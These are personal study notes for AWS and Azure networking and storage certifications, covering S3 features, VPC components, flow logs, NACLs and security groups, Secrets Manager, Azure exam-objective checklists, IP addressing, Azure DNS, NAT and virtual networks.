
    Compliance mode


    • A protected object version can’t be overwritten or deleted by any user, including the root user
    • When an object is locked in compliance mode, its retention mode can’t be changed, and its retention period can’t be shortened.
    • Compliance mode helps ensure that an object version can’t be overwritten or deleted for the duration of the retention period

S3 Event Notifications

  • Automatically react to events within S3
  • Send events to SNS, SQS, Lambda, or EventBridge. EventBridge can then send the notification to many other AWS services
    • S3 requires permissions to these resources
  • Use case: generate thumbnails of images
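A minimal boto3 sketch of wiring up the thumbnail use case (the bucket and Lambda ARN are placeholders; S3 also needs lambda:InvokeFunction permission on the function):

    import boto3

    s3 = boto3.client("s3")

    s3.put_bucket_notification_configuration(
        Bucket="my-bucket",
        NotificationConfiguration={
            "LambdaFunctionConfigurations": [{
                "LambdaFunctionArn": "arn:aws:lambda:us-east-1:123456789012:function:make-thumbnail",
                "Events": ["s3:ObjectCreated:*"],
                # Only trigger for .jpg uploads
                "Filter": {"Key": {"FilterRules": [{"Name": "suffix", "Value": ".jpg"}]}},
            }]
        },
    )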

S3 Access Point

  • Simplify security management for S3 buckets
  • Each access point has its own DNS name and access point policy (similar to a bucket policy)

AWS Transfer Family

  • Use FTP, FTPS, or SFTP to transfer files to AWS
  • Pay per provisioned endpoint per hour + data transfer in GB
  • Integrate with existing Authentication system
  • Usage: Sharing files, public datasets, etc.

AWS DataSync

  • Move large amounts of data to and from on-prem or other cloud locations into AWS
    • Use NFS, SMB, HDFS, etc. Needs an agent installed.
  • Move data from one AWS service to another; no agent required.
  • Replication tasks are scheduled (synced)
  • Preserves file permissions and metadata (remember this for the exam!)
  • One agent can use up to 10 Gbps. However, you can setup limits.

Storage Comparison

  • S3: Object Storage
  • S3 Glacier: Object Archival
  • EBS volumes: Network storage for one EC2 instance at a time
  • Instance Storage: Physical storage for your EC2 instance (high IOPS)
  • EFS: Network File System for Linux instances, POSIX filesystem
  • FSx for Windows: Network File System for Windows servers
  • FSx for Lustre: High Performance Computing Linux file system
  • FSx for NetApp ONTAP: High OS Compatibility
  • FSx for OpenZFS: Managed ZFS file system
  • Storage Gateway: S3 & FSx File Gateway, Volume Gateway (cache & stored), Tape Gateway
  • Transfer Family: FTP, FTPS, SFTP interface on top of Amazon S3 or Amazon EFS
  • DataSync: Schedule data sync from on-premises to AWS, or AWS to AWS
  • Snowcone / Snowball / Snowmobile: to move large amounts of data to the cloud, physically
  • Database: for specific workloads, usually with indexing and querying

Vpc-endpoint-cheatsheet

  • VPC Endpoints help keep traffic between AWS services within the AWS Network
  • There are two types of VPC Endpoints
    • Interface Endpoints
    • Gateway Endpoints
| Interface Endpoints | Gateway Endpoints |
|---|---|
| Cost money | Free |
| Use an Elastic Network Interface (ENI) with a private IP (powered by AWS PrivateLink) | A target for a specific route in the route table |
| Support many AWS services | Only support S3 and DynamoDB |

Vpc-flow-logs-cheatsheet

  • VPC Flow Logs monitor the in-and-out traffic of the network interfaces within your VPC
  • You can turn on Flow Logs at the VPC, subnet, or network interface level
  • VPC Flow Logs cannot be tagged like other AWS resources
  • You cannot change the configuration of a flow log after it’s created
  • You cannot enable flow logs for VPCs that are peered with your VPC unless they are in the same account
  • VPC Flow Logs can be delivered to S3 or CloudWatch Logs
  • VPC Flow logs contains the source and destination IP addresses (not hostnames)
  • Some instance traffic is not monitored :
    • Instance traffic generated by contacting the AWS DNS servers
    • Windows license activation traffic from instances
    • Traffic to and from the instance metadata address (169.254.169.254)
    • DHCP Traffic
    • Any Traffic to the reserved IP address of the default VPC router

Introduction to VPC


  • Think of an AWS VPC as your own personal data center
  • Gives you complete control over your virtual networking environment.

Core Components


  • Internet Gateway (IGW)
  • Virtual Private Gateway (VPN Gateway)
  • Routing Tables
  • Network Access Control Lists (NACLs) - Stateless
  • Security Groups (SG) Stateful
  • Public Subnets
  • Private Subnets
  • Nat Gateway
  • Customer Gateway
  • VPC Endpoints
  • VPC Peering

Key Features


  • VPCs are region-specific; they do not span regions
  • You can create 5 VPCs per region (default limit)
  • Every region comes with a default VPC
  • You can have 200 subnets per VPC
  • You can use IPv4 CIDR blocks (the address range of the VPC)
  • Cost nothing: VPCs, Route Tables, NACLs, Internet Gateways, Security Groups, Subnets, VPC Peering
  • Some things cost money: e.g. NAT Gateway, VPC Endpoints, VPN Gateway, Customer Gateway
  • DNS hostnames (whether your instances get DNS hostnames)

Default VPC


  • Create a VPC with a size /16 IPv4 CIDR block (172.31.0.0/16)
  • Create a size /20 default subnet in each AZ
  • Create an Internet Gateway and connect it to your default VPC
  • Create a default security group and associate it with your default VPC
  • Create a default network access control list (NACL) and associate it with your default VPC
  • Associate the default DHCP options set for your AWS account with your default VPC
  • when you create a VPC, it automatically has a main route table

VPC Peering


  • VPC Peering allows you to connect one VPC to another over a direct network route using private IP addresses

  • Instances on peered VPCs behave just like they are on the same network

  • Connect VPCs across same or different AWS accounts and regions

  • Peering uses a Star Configuration: 1 Central VPC - 4 other VPCs

  • No Transitive Peering (peering must take place directly between VPCs)

    • Needs a one-to-one connection to each immediate VPC
  • No Overlapping CIDR Blocks


Route Tables


  • Route Tables are used to determine where network traffic is directed

  • Each subnet in your VPC must be associated with a route table

  • A subnet can only be associated with one route table at a time, but you can associate multiple subnets with the same route table


Internet Gateway (IGW)


  • The Internet Gateway allows your VPC access to the Internet

  • IGW does two things:

    1. Provide a target in your VPC route tables for internet-routable traffic
    2. Perform network address translation (NAT) for instances that have been assigned public IPv4 addresses
  • To route out to the internet, add a route in your route table that points to the Internet Gateway, with the Destination set to 0.0.0.0/0


Bastion/Jumpbox


  • Bastions are EC2 instances which are security hardened.

  • They are designed to help you gain access to your EC2 instances in a private subnet via SSH or RDP

  • They are also known as Jump boxes because you are jumping from one box to access another.

  • NAT Gateways/Instances are only intended for EC2 instances to gain outbound access to the internet for things such as security updates.

  • NATs cannot/should not be used as Bastions

  • System Manager’s Sessions Manager replaces the need for Bastions


Direct Connect


  • AWS Direct Connect is the AWS Solution for establishing dedicated network connections from on-premises locations to AWS

  • Very fast network: lower bandwidth 50 Mbps-500 Mbps, or higher bandwidth 1 Gbps or 10 Gbps

  • Helps reduce network costs and increase bandwidth throughput (great for high traffic networks)

  • Provides a more consistent network experience than a typical internet-based connection (reliable and secure)


VPC Endpoints


  • { Think of a secret tunnel where you don’t have to leave the AWS network }

  • VPC Endpoints allow you to privately connect your VPC to other AWS services, and VPC endpoint services

  • There are two types of VPC Endpoints

    1. Interface endpoints
    2. Gateway Endpoints
  • Eliminates the need for an Internet Gateway, NAT device, VPN connection or AWS Direct Connect connections

  • Instances in the VPC do not require a public IP address to communicate with service resources

  • Traffic between your VPC and other services does not leave the AWS network

  • Horizontally scaled, redundant, and highly available VPC component

  • Allows secure communication between instances and services without adding availability risks or bandwidth constraints on your traffic


Interface Endpoints


  • Interface Endpoints are Elastic Network Interfaces (ENI) with a private IP address. They serve as an entry point for traffic going to a supported service
    • Interface Endpoints are powered by AWS PrivateLink
    • Access services hosted on AWS easily and securely by keeping your network traffic within the AWS network
    • Roughly ~$7.50/month per endpoint per AZ:
      • Pricing per VPC endpoint per AZ: $0.01/hour
      • Pricing per GB of data processed: $0.01
  • Interface Endpoints support the following AWS services
    • API Gateway
    • CloudFormation
    • CloudWatch
    • Kinesis
    • SageMaker
    • CodeBuild
    • AWS Config
    • EC2 API
    • ELB API
    • AWS KMS
    • Secrets Manager
    • Security Token Service
    • Service Catalog
    • SNS, SQS
    • Systems Manager
    • Marketplace Partner Services
    • Endpoint Services in other AWS accounts

VPC Gateway Endpoints


  • A Gateway Endpoint is a gateway that is a target for a specific route in your route table, used for traffic destined for a supported AWS service.
  • To create a Gateway Endpoint, you must specify the VPC in which you want to create the endpoint, and the service to which you want to establish the connection
  • AWS Gateway Endpoint currently supports 2 services
    • Amazon S3
    • DynamoDB
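A minimal boto3 sketch of creating a Gateway Endpoint for S3 (the VPC ID, route table ID, and region are placeholders); a route to the endpoint is added to the specified route table.

    import boto3

    ec2 = boto3.client("ec2")

    ec2.create_vpc_endpoint(
        VpcEndpointType="Gateway",
        VpcId="vpc-0123456789abcdef0",
        ServiceName="com.amazonaws.us-east-1.s3",
        RouteTableIds=["rtb-0123456789abcdef0"],
    )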

VPC Flow Logs


  • VPC Flow Logs allow you to capture IP traffic information in and out of the network interfaces within your VPC

  • Flow Logs can be created for

    1. VPC
    2. Subnets
    3. Network Interface
  • All log data is stored using Amazon Cloudwatch Logs

  • After a Flow Log is created it can be viewed in detail within CloudWatch Logs

  • [version][account-id][interface-id][srcaddr][dstaddr][srcport][destport][protocol][packets][bytes][start][end][action][log-status]

  • 2 123456789010 eni-abc123de 172.31.16.139 172.31.16.21 20641 22 6 20 4249 1418530010 1418530070 ACCEPT OK

    • Version The VPC flow logs version
    • account- id The AWS account ID for the flow log
    • interface-id The ID of the network interface for which the traffic is recorded
    • srcaddr The source IPv4 or IPv6 address. The IPv4 address of the network interface is always its private IPv4 address
    • dstaddr The destination IPv4 or IPv6 address. The IPv4 address of the network interface is always its private IPv4 address
    • srcport The source port of the traffic
    • dstport The destination port of the traffic
    • protocol The IANA protocol number of the traffic. For more information, see assigned Internet Protocol Numbers.
    • Packets The number of packets transferred during the capture window
    • Bytes The number of bytes transferred during the capture window
    • start The time, in Unix Seconds of the start of the capture window
    • end The time, in Unix seconds, of the end of the capture window
    • action The action associated with the traffic
      • ACCEPT: The recorded traffic was permitted by the security groups or network ACLs
      • REJECT: The recorded traffic was not permitted by the security groups or network ACLs
    • log-status The logging status of the flow log
      • OK: Data is logging normally to the chosen destinations
      • NODATA: There was no network traffic to or from the network interface during the capture window
      • SKIPDATA: Some flow log records were skipped during the capture window. This may be because of an internal capacity constraint or an internal error

NACLs


  • Network Access Control List (NACLs)

  • An (optional) layer of Security that acts as a firewall for controlling traffic in and out of subnet(s) .

  • NACLs act as a virtual firewall at the subnet level

  • VPCs automatically get a default NACL

  • Subnets are associated with NACLs. Subnets can only belong to a single NACL

  • Each NACL contains a set of rules that can allow or deny traffic into (inbound) and out of (outbound)

  • Rule # determines the order of evaluation, from lowest to highest. The highest rule # can be 32766, and it’s recommended to work in increments of 10 or 100.

  • You can allow or deny traffic. You can block a single IP address (you can’t do this with Security Groups alone)

  • Use Case

    • We determine that a malicious actor at a specific IP address is trying to access our instances, so we block their IP

    • We never need to SSH into instances, so we add a DENY for these subnets. This is just an additional measure in case our security group’s SSH port was left open.


Security Groups


  • Security Groups

    • A virtual firewall that controls the traffic to and from EC2 Instances
  • Security Groups are associated with Ec2 instances

  • Each Security Group contains a set of rules that filter traffic coming into (inbound) and out of (outbound) Ec2 instances.

  • There are no ‘Deny’ rules. All traffic is blocked by default unless a rule specifically allows it.

  • Multiple Instances across multiple subnets can belong to a Security Group.

  • Use Case:

    • You can specify the source to be an IP range or a specific ip (/32 is a specific IP address)
    • You can specify the source to be another security group
    • An instance can belong to multiple Security Groups, and rules are permissive (instead of restrictive). Meaning if you have one Security Group which has no allow and you add an allow to another, then it will allow.
  • Limits:

    • You can have up to 10,000 Security Groups in a Region (default is 2,500)
    • You can have 60 inbound rules and 60 outbound rules per Security Group
    • 16 Security Groups per Elastic Network Interface (ENI) (default is 5)

NACL v/s Security Groups



Site to Site VPN , Virtual Private Gateway and Customer Gateway


  • Virtual Private Gateway (VGW)
    • VPN concentrator on the AWS side of the VPN connection
    • VGW is created and attached to the VPC from which you want to create Site-to-Site VPN connection
  • Customer Gateway Device (On-Premises)
    • What IP address to use?
      • Public Internet-routable IP address for your Customer Gateway device
      • If it’s behind a NAT device that’s enabled for NAT traversal (NAT-T), use the public IP address of the NAT device
      • Important Step: enable Route Propagation for the Virtual Private Gateway in the route table that is associated with your subnets
      • If you need to ping your EC2 instances from on-premises, make sure you add the ICMP protocol on the inbound of your security groups

Secrets Manager


  • Helps to manage, retrieve and rotate database credentials, application credentials, OAuth tokens, API keys and other secrets throughout their lifecycles
  • Helps to improve your security posture, because you no longer need hard-coded credentials in application source code.
    • Storing the credentials in Secrets Manager helps to avoid possible compromise by anyone who can inspect the application or the components.
    • Replace hard-coded credentials with a runtime call to the Secrets Manager service to retrieve credentials dynamically when you need them, as sketched below.
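
A minimal sketch of that runtime call using boto3 (the secret name my-app/db-credentials and the JSON shape of the secret are hypothetical):

```python
import json

import boto3

def get_db_credentials(secret_id: str = "my-app/db-credentials") -> dict:
    """Fetch a secret at runtime instead of hard-coding it in source or config."""
    client = boto3.client("secretsmanager")
    response = client.get_secret_value(SecretId=secret_id)
    # Secrets Manager returns the value as SecretString (or SecretBinary for binary secrets)
    return json.loads(response["SecretString"])

creds = get_db_credentials()
# e.g. connect to the database with creds["username"] / creds["password"] (hypothetical keys)
```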

Azure

Notes related to Microsoft Azure.

Directory Map

Core Networking Infrastructure Checklist

Design and Implement Private IP Addressing for Azure Resources

  • Plan and implement network segmentation and address spaces
  • Create a virtual network (VNet)
  • Plan and configure subnetting for services, including VNet gateways, private endpoints, firewalls, application gateways, VNet-integrated platform services, and Azure Bastion
  • Plan and configure subnet delegation
  • Create a prefix for public IP addresses
  • Choose when to use a public IP address prefix
  • Plan and implement a custom public IP address prefix (bring your own IP)
  • Create a new public IP address
  • Associate public IP addresses to resources

Design and Implement Name Resolution

  • Design name resolution inside a VNet
  • Configure DNS settings for a VNet
  • Design public DNS zones
  • Design private DNS zones
  • Configure a public or private DNS zone
  • Link a private DNS zone to a VNet

Design and Implement VNet Connectivity and Routing

  • Design service chaining, including gateway transit
  • Design virtual private network (VPN) connectivity between VNets
  • Implement VNet peering
  • Design and implement user-defined routes (UDRs)
  • Associate a route table with a subnet
  • Configure forced tunneling
  • Diagnose and resolve routing issues
  • Design and implement Azure Route Server
  • Identify appropriate use cases for a Virtual Network NAT gateway
  • Implement a NAT gateway

Monitor Networks

  • Configure monitoring, network diagnostics, and logs in Azure Network Watcher
  • Monitor and repair network health using Azure Network Watcher
  • Activate and monitor distributed denial-of-service (DDoS) protection
  • Activate and monitor Microsoft Defender for DNS

Design, Implement, and Manage Connectivity Services Checklist

Design, Implement, and Manage a Site-to-Site VPN Connection

  • Design a site-to-site VPN connection, including for high availability
  • Select an appropriate VNet gateway SKU for site-to-site VPN requirements
  • Implement a site-to-site VPN connection
  • Identify when to use a policy-based VPN versus a route-based VPN connection
  • Create and configure an IPsec/IKE policy
  • Diagnose and resolve virtual network gateway connectivity issues
  • Implement Azure Extended Network

Design, Implement, and Manage a Point-to-Site VPN Connection

  • Select an appropriate virtual network gateway SKU for point-to-site VPN requirements
  • Select and configure a tunnel type
  • Select an appropriate authentication method
  • Configure RADIUS authentication
  • Configure certificate-based authentication
  • Configure authentication using Azure Active Directory (Azure AD), part of Microsoft Entra
  • Implement a VPN client configuration file
  • Diagnose and resolve client-side and authentication issues
  • Specify Azure requirements for Always On authentication
  • Specify Azure requirements for Azure Network Adapter

Design, Implement, and Manage Azure ExpressRoute

  • Select an ExpressRoute connectivity model
  • Select an appropriate ExpressRoute SKU and tier
  • Design and implement ExpressRoute to meet requirements, including cross-region connectivity, redundancy, and disaster recovery
  • Design and implement ExpressRoute options, including Global Reach, FastPath, and ExpressRoute Direct
  • Choose between private peering only, Microsoft peering only, or both
  • Configure private peering
  • Configure Microsoft peering
  • Create and configure an ExpressRoute gateway
  • Connect a virtual network to an ExpressRoute circuit
  • Recommend a route advertisement configuration
  • Configure encryption over ExpressRoute
  • Implement Bidirectional Forwarding Detection
  • Diagnose and resolve ExpressRoute connection issues

Design and Implement an Azure Virtual WAN Architecture

  • Select a Virtual WAN SKU
  • Design a Virtual WAN architecture, including selecting types and services
  • Create a hub in Virtual WAN
  • Choose an appropriate scale unit for each gateway type
  • Deploy a gateway into a Virtual WAN hub
  • Configure virtual hub routing
  • Create a network virtual appliance (NVA) in a virtual hub
  • Integrate a Virtual WAN hub with a third-party NVA

Design and Implement Application Delivery Services Checklist

Design and Implement an Azure Load Balancer

  • Map requirements to features and capabilities of Azure Load Balancer
  • Identify appropriate use cases for Azure Load Balancer
  • Choose an Azure Load Balancer SKU and tier
  • Choose between public and internal
  • Create and configure an Azure Load Balancer
  • Implement a load balancing rule
  • Create and configure inbound NAT rules
  • Create and configure explicit outbound rules, including SNAT

Design and Implement Azure Application Gateway

  • Map requirements to features and capabilities of Azure Application Gateway
  • Identify appropriate use cases for Azure Application Gateway
  • Create a back-end pool
  • Configure health probes
  • Configure listeners
  • Configure routing rules
  • Configure HTTP settings
  • Configure Transport Layer Security (TLS)
  • Configure rewrite sets

Design and Implement Azure Front Door

  • Map requirements to features and capabilities of Azure Front Door
  • Identify appropriate use cases for Azure Front Door
  • Choose an appropriate tier
  • Configure an Azure Front Door, including routing, origins, and endpoints
  • Configure SSL termination and end-to-end SSL encryption
  • Configure caching
  • Configure traffic acceleration
  • Implement rules, URL rewrite, and URL redirect
  • Secure an origin using Azure Private Link in Azure Front Door

Design and Implement Azure Traffic Manager

  • Identify appropriate use cases for Azure Traffic Manager
  • Configure a routing method
  • Configure endpoints

Design and Implement Private Access to Azure Services Checklist

  • Plan an Azure Private Link service
  • Create a Private Link service
  • Integrate a Private Link service with DNS
  • Plan private endpoints
  • Create private endpoints
  • Configure access to Azure resources using private endpoints
  • Connect on-premises clients to a private endpoint
  • Integrate a private endpoint with DNS

Design and Implement Service Endpoints

  • Choose when to use a service endpoint
  • Create service endpoints
  • Configure service endpoint policies
  • Configure access to service endpoints

Secure Network Connectivity to Azure Resources Checklist

Implement and Manage Network Security Groups (NSGs)

  • Create a network security group (NSG)
  • Associate an NSG to a resource
  • Create an application security group (ASG)
  • Associate an ASG to a network interface card (NIC)
  • Create and configure NSG rules
  • Interpret NSG flow logs
  • Validate NSG flow rules
  • Verify IP flow
  • Configure an NSG for remote server administration, including Azure Bastion

Design and Implement Azure Firewall and Azure Firewall Manager

  • Map requirements to features and capabilities of Azure Firewall
  • Select an appropriate Azure Firewall SKU
  • Design an Azure Firewall deployment
  • Create and implement an Azure Firewall deployment
  • Configure Azure Firewall rules
  • Create and implement Azure Firewall Manager policies
  • Create a secure hub by deploying Azure Firewall inside an Azure Virtual WAN hub

Design and Implement a Web Application Firewall (WAF) Deployment

  • Map requirements to features and capabilities of WAF
  • Design a WAF deployment
  • Configure detection or prevention mode
  • Configure rule sets for WAF on Azure Front Door
  • Configure rule sets for WAF on Application Gateway
  • Implement a WAF policy
  • Associate a WAF policy

Design-and-implement-core-network-infra

Directory Map

IPv4 and IPv6 Addressing

IPv4 Addressing

Definition: IPv4 (Internet Protocol version 4) is the fourth version of the Internet Protocol (IP). It is the most widely used IP version for connecting devices to the internet.

Format:

  • IPv4 addresses are 32-bit numerical labels.
  • Represented in decimal format as four octets separated by periods (e.g., 192.168.1.1).
  • Each octet can range from 0 to 255.

Classes:

  • Class A: 0.0.0.0 to 127.255.255.255 (large networks)
  • Class B: 128.0.0.0 to 191.255.255.255 (medium-sized networks)
  • Class C: 192.0.0.0 to 223.255.255.255 (small networks)
  • Class D: 224.0.0.0 to 239.255.255.255 (multicast)
  • Class E: 240.0.0.0 to 255.255.255.255 (experimental)

Special Addresses:

  • Private Addresses:
    • Class A: 10.0.0.0 to 10.255.255.255
    • Class B: 172.16.0.0 to 172.31.255.255
    • Class C: 192.168.0.0 to 192.168.255.255
  • Loopback Address: 127.0.0.1
  • Broadcast Address: 255.255.255.255

Limitations:

  • Limited address space (about 4.3 billion addresses).
  • Exhaustion of available addresses.

IPv6 Addressing

Definition: IPv6 (Internet Protocol version 6) is the successor to IPv4, designed to address the limitations and address exhaustion of IPv4.

Format:

  • IPv6 addresses are 128-bit numerical labels.
  • Represented in hexadecimal format as eight groups of four hexadecimal digits separated by colons (e.g., 2001:0db8:85a3:0000:0000:8a2e:0370:7334).
  • Leading zeros in each group can be omitted, and consecutive groups of zeros can be replaced with “::” (e.g., 2001:db8:85a3::8a2e:370:7334).

Special Addresses:

  • Unicast Addresses: Identifies a single interface.
    • Global Unicast: Globally unique (e.g., 2000::/3).
    • Link-Local: Used within a single network segment (e.g., fe80::/10).
  • Multicast Addresses: Identifies multiple interfaces (e.g., ff00::/8).
  • Anycast Addresses: Assigned to multiple interfaces, with packets delivered to the nearest one.
  • Loopback Address: ::1
  • Unique Local Addresses (ULA): fc00::/7

Advantages:

  • Vast address space (2^128 addresses).
  • Improved routing efficiency and hierarchical addressing.
  • Simplified packet header for better performance.
  • Enhanced security features (mandatory IPsec support).
  • Auto-configuration capabilities.

Comparison

Feature | IPv4 | IPv6
Address Length | 32 bits | 128 bits
Address Format | Decimal (e.g., 192.168.1.1) | Hexadecimal (e.g., 2001:db8::1)
Address Space | ~4.3 billion addresses | Virtually unlimited (2^128 addresses)
Header Complexity | More complex | Simplified
Configuration | Manual or DHCP | Auto-configuration (stateless)
Security | Optional (IPsec) | Mandatory (IPsec)

IPv4 and IPv6 are both critical for networking, with IPv6 designed to overcome the limitations of IPv4 and ensure the continued growth and scalability of the internet.
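
Python's standard ipaddress module is a convenient way to sanity-check the notation rules above (private ranges, CIDR membership, IPv6 zero compression); a small sketch:

```python
import ipaddress

# IPv4: private-range and CIDR membership checks
addr = ipaddress.ip_address("192.168.1.1")
print(addr.is_private)                                 # True (RFC 1918)
print(addr in ipaddress.ip_network("192.168.0.0/16"))  # True

# IPv6: leading zeros dropped, consecutive zero groups compressed to '::'
v6 = ipaddress.ip_address("2001:0db8:85a3:0000:0000:8a2e:0370:7334")
print(v6.compressed)  # 2001:db8:85a3::8a2e:370:7334
print(v6.exploded)    # full eight-group form

# Loopback addresses for both versions
print(ipaddress.ip_address("127.0.0.1").is_loopback, ipaddress.ip_address("::1").is_loopback)
```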

Azure DNS

Definition

Azure DNS is a cloud-based Domain Name System (DNS) service provided by Microsoft Azure. It allows you to host your DNS domains alongside your Azure resources, enabling you to manage DNS records using the same credentials, APIs, tools, and billing as your other Azure services.

Key Features

  1. Global Reach:

    • Azure DNS uses a global network of name servers to provide fast DNS responses and high availability.
    • DNS queries are answered from the closest DNS server to the end user.
  2. DNS Zones:

    • Host your DNS domain in Azure DNS by creating a DNS zone.
    • A DNS zone is used to manage the DNS records for a specific domain.
  3. DNS Records:

    • Support for all common DNS record types, including A, AAAA, CNAME, MX, NS, PTR, SOA, SRV, and TXT.
    • Manage records through the Azure portal, Azure CLI, Azure PowerShell, and REST API.
  4. Alias Records:

    • Alias records allow you to map DNS names to Azure resources like Azure Traffic Manager, public IP addresses, and Azure Content Delivery Network (CDN) endpoints.
    • Automatically update DNS records when the underlying Azure resources change.
  5. Integration with Azure Services:

    • Seamlessly integrate with other Azure services for dynamic DNS updates and automated DNS management.
    • Use Azure Private DNS for internal domain name resolution within your Azure virtual networks.
  6. Security:

    • DNS queries are secured with DNSSEC (DNS Security Extensions) to protect against spoofing and cache poisoning.
    • Role-Based Access Control (RBAC) to manage permissions and access to DNS zones and records.
  7. Scalability:

    • Azure DNS is designed to handle large-scale DNS workloads.
    • Scalable to meet the needs of high-traffic domains.
  8. Monitoring and Analytics:

    • Monitor DNS queries and traffic patterns using Azure Monitor.
    • View detailed metrics and logs for DNS performance and availability.

Best Practices

  1. Zone Management:

    • Use descriptive names for DNS zones to clearly identify their purpose.
    • Organize DNS zones to reflect the structure of your organization or application.
  2. Record Management:

    • Use alias records to simplify DNS management for Azure resources.
    • Regularly review and update DNS records to ensure accuracy.
  3. Security:

    • Implement DNSSEC to enhance the security of your DNS infrastructure.
    • Use RBAC to control access to DNS zones and records.
  4. Monitoring:

    • Enable monitoring and logging for DNS zones to detect and troubleshoot issues.
    • Set up alerts for unusual DNS activity or changes in traffic patterns.

Use Cases

  • Hosting DNS Domains: Manage DNS records for your domains within Azure.
  • Internal Domain Resolution: Use Azure Private DNS for internal name resolution within virtual networks.
  • Application Delivery: Optimize DNS routing with Azure Traffic Manager for high availability and performance.
  • Automated DNS Management: Integrate with Azure services for dynamic DNS updates and automation.

Azure DNS provides a reliable and scalable DNS service that simplifies domain management and integrates seamlessly with your Azure infrastructure.

Internal (Private) Name Resolution Scenarios and Options

  • Scenarios:

    • Name Resolution within a Virtual Network: Resolve names of resources within the same virtual network.
    • Name Resolution between Virtual Networks: Resolve names of resources across different virtual networks.
    • Name Resolution between On-Premises and Azure: Resolve names of resources between on-premises networks and Azure virtual networks.
  • Options:

    • Azure-provided DNS: Use Azure-provided DNS for name resolution within a virtual network.

      • This is the default when you create a virtual network in Azure. Anytime you create a vNet in Azure, the platform configures it to use this option and assigns a unique private DNS suffix to it in the .internal.cloudapp.net format. Azure’s DHCP will assign this DNS suffix to any resource that obtains an IP address.
      • The default Azure provided DNS Server uses a virtual IP address of 168.63.129.16. This server limits each client to 1000 queries per second. Anything above this is throttled.
      • This option can only cover scenario 1 above (Name Resolution within a Virtual Network).
      • This option does not support WINS or NetBios.
      • We cannot enable or configure logging within this option.
    • Custom DNS: Configure custom DNS servers for name resolution within a virtual network.

      • You can host your own DNS server and forward name resolution requests to it.
    • Azure Private DNS: Use Azure Private DNS for name resolution between virtual networks and on-premises networks.

      • Azure Private DNS provides a reliable, secure DNS service to manage and resolve domain names in a virtual network without the need for a custom DNS solution.
      • This service can be used to create forward and reverse DNS zones (up to a max of 1000 per subscription).
      • An Azure Private DNS Zone can contain up to 25000 record sets, and supports all common record types.
      • After you create a Private DNS zone, it must be ‘linked’ to a vNet.
      • When linking a Private DNS Zone to a vNet, you can choose to enable auto-registration of virtual machines in the vNet to the DNS zone. This will automatically register the VM’s hostname and IP address in the DNS zone.
      • A virtual network can be linked to multiple private DNS zones, but it can only be linked to one private DNS zone with auto-registration enabled.

Public Name Resolution Scenarios and Options

  • Scenarios:
    • Name Resolution for Internet Clients: Resolve names of resources for clients on the internet.
  • Options:
    • Azure DNS: Use Azure DNS for public name resolution.
      • Azure DNS is a cloud-based DNS service that hosts your DNS domains and provides name resolution for internet clients.
      • You can manage DNS records for your domains using Azure DNS and integrate it with other Azure services.

Azure Virtual Network NAT

  • Azure Virtual Network NAT (Network Address Translation) is a service that enables outbound connectivity for virtual networks. It allows virtual machines (VMs) in a virtual network to access the internet without public IP addresses. NAT simplifies outbound connectivity for VMs by translating their private IP addresses to a public IP address.

Azure Virtual Network NAT provides the following key features and benefits:

  • Outbound Connectivity: NAT enables VMs in a virtual network to access the internet for software updates, package downloads, and other external services without requiring public IP addresses on the VMs themselves.
  • Security: NAT helps secure your virtual network by hiding the private IP addresses of VMs from external sources. Only the public IP address of the NAT gateway is exposed to the internet.
  • Cost-Effective: NAT reduces the need for public IP addresses on individual VMs, which can help lower costs associated with IP address management.
  • Scalability: NAT can handle high volumes of outbound traffic from multiple VMs in a virtual network, providing scalable outbound connectivity for your applications.
  • Ease of Management: NAT simplifies outbound connectivity configuration by providing a centralized service for translating private IP addresses to a public IP address.

Subnets

Virtual Machine Scale Sets

Azure Virtual Machine Scale Sets offer a robust and flexible solution for deploying, managing, and scaling applications, ensuring high availability and optimal performance to meet varying demands.

Overview

  • Used to create and manage a group of identical, load balanced VMs
  • Traffic will be distributed to the VM instances via a load balancer service
  • VM instances are managed by a single Azure Resource Manager template
  • VM instances can be automatically scaled in or out based on demand or a defined schedule
  • VM instances can be automatically healed if they become unhealthy
  • VM instances can be automatically updated with the latest OS image
  • VM instances can be automatically deployed across multiple fault domains and update domains
  • VM instances can be automatically deployed across multiple regions
  • VM instances can be automatically deployed across multiple availability zones

Use Cases

  • Web front ends
  • API services
  • Batch processing
  • Containers
  • Microservices

Components

  • Scale Set: The group of identical VM instances
  • Load Balancer: Distributes traffic to the VM instances
  • Health Probe: Monitors the health of the VM instances
  • Scale Out: Increases the number of VM instances
  • Scale In: Decreases the number of VM instances
  • Auto Scale: Automatically scales the number of VM instances based on demand or a defined schedule
  • Auto Heal: Automatically heals unhealthy VM instances
  • Auto Update: Automatically updates the OS image of the VM instances
  • Fault Domain: A group of VM instances that share a common power source and network switch
  • Update Domain: A group of VM instances that are updated together

Pricing

  • Pay only for the VM instances that are running
  • No additional charge for the scale set service
  • No additional charge for the load balancer service
  • No additional charge for the health probe service

Scaling

  • Manual Scaling: Increase or decrease the number of VM instances manually
  • Auto Scaling: Automatically increase or decrease the number of VM instances based on demand or a defined schedule
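
Autoscale ultimately boils down to comparing an aggregated metric against scale-out and scale-in thresholds; a toy sketch of that decision (the thresholds, limits, and metric values are made up):

```python
def autoscale_decision(avg_cpu: float, instances: int,
                       scale_out_at: float = 75.0, scale_in_at: float = 25.0,
                       minimum: int = 2, maximum: int = 10) -> int:
    """Return the new instance count given average CPU over the evaluation window."""
    if avg_cpu > scale_out_at and instances < maximum:
        return instances + 1   # scale out
    if avg_cpu < scale_in_at and instances > minimum:
        return instances - 1   # scale in
    return instances           # within the band: no change

print(autoscale_decision(avg_cpu=82.0, instances=3))  # 4
print(autoscale_decision(avg_cpu=12.0, instances=3))  # 2
```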

Azure Virtual Network (VNet)


Introduction

Definition:

  • Azure Virtual Network (VNet) is a fundamental component of Microsoft Azure, allowing you to create private networks within the Azure cloud. These networks can be isolated or connected to on-premises data centers, providing a flexible and secure environment for deploying and managing resources. Azure Virtual Network provides the flexibility, security, and scalability needed to build robust cloud-based network infrastructures, supporting a wide range of applications and services.

Key Features:

  1. Isolation and Segmentation:

    • Create isolated networks for your resources.
    • Use subnets to segment the VNet into smaller address spaces for organization and security.
  2. Security:

    • Implement Network Security Groups (NSGs) to control inbound and outbound traffic.
    • Use Azure Firewall for advanced network security.
  3. Connectivity:

    • Connect VNets to each other using VNet peering.
    • Link your VNet to on-premises networks using VPN Gateway or ExpressRoute.
    • Enable secure connections to the internet or other Azure services.
  4. Scalability and Availability:

    • Scale your network by adding or resizing subnets.
    • Ensure high availability with Azure’s global infrastructure.
  5. Integration with Azure Services:

    • Seamlessly integrate with Azure services like Azure Kubernetes Service (AKS), Azure App Service, and Azure Storage.
    • Use service endpoints to secure your Azure services within your VNet.
  6. DNS and Customization:

    • Customize DNS settings for your VNet.
